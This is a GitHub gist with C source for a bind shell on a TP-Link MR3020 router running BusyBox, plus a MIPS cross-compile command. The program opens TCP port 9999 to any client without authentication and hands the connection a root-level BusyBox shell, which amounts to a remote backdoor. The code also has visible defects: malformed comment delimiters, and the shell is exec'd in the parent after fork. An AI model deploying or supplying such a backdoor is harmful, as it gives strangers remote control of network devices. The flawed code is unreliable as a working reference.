Last active
March 25, 2022 13:54
-
-
Save OsandaMalith/a3b213b5e7582cf9aac3 to your computer and use it in GitHub Desktop.
Bind Shell using Fork for my TP-Link mr3020 router running busybox
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <stdlib.h> | |
#include <string.h> | |
#include <sys/types.h> | |
#include <sys/socket.h> | |
#include <netinet/in.h> | |
#define SERVER_PORT 9999 | |
/ * CC-BY: Osanda Malith Jayathissa (@OsandaMalith) | |
* Bind Shell using Fork for my TP-Link mr3020 router running busybox | |
* Arch : MIPS | |
* mips-linux-gnu-gcc mybindshell.c -o mybindshell -static -EB -march=24kc | |
* / | |
int main() { | |
int serverfd, clientfd, server_pid, i = 0; | |
char *banner = "[~] Welcome to @OsandaMalith's Bind Shell\n"; | |
char *args[] = { "/bin/busybox", "sh", (char *) 0 }; | |
struct sockaddr_in server, client; | |
socklen_t len; | |
server.sin_family = AF_INET; | |
server.sin_port = htons(SERVER_PORT); | |
server.sin_addr.s_addr = INADDR_ANY; | |
serverfd = socket(AF_INET, SOCK_STREAM, 0); | |
bind(serverfd, (struct sockaddr *)&server, sizeof(server)); | |
listen(serverfd, 1); | |
while (1) { | |
len = sizeof(struct sockaddr); | |
clientfd = accept(serverfd, (struct sockaddr *)&client, &len); | |
server_pid = fork(); | |
if (server_pid) { | |
write(clientfd , banner , strlen(banner)); | |
for(; i <3 /*u*/; i++) dup2(clientfd, i); | |
execve("/bin/busybox", args, (char *) 0); | |
close(clientfd); | |
} close(clientfd); | |
} return 0; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment